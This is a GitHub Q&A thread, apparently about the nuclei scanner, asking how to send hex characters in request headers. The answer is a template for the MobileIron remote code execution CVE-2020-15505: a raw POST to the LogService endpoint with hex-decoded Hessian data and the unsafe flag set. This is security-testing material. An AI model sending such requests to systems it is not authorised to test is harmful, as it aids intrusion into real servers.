Skip to content

How to send hexadecimal characters in request headers #6257

Closed Answered by ehsandeep
xqd-ai asked this question in Q&A
Discussion options

You must be logged in to vote

@xqd-ai, you need to use unsafe: true to send malformed headers, for example -

id: CVE-2020-15505

info:
  name: MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution
  author: dwisiswant0
  severity: critical

requests:
  - raw:
      - |
        POST /mifs/.;/services/LogService HTTP/1.1
        Host: {{Hostname}}
        Referer: {{hex_decode('630200480004')}}
        Content-Type: x-application/hessian
        Connection: close

        {{hex_decode('630200480004')}}

    unsafe: true

Replies: 5 comments

Comment options

You must be logged in to vote
0 replies
Comment options

You must be logged in to vote
0 replies
Comment options

You must be logged in to vote
0 replies
Comment options

You must be logged in to vote
0 replies
Answer selected by xqd-ai
Comment options

You must be logged in to vote
0 replies
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Category
Q&A
Labels
None yet
2 participants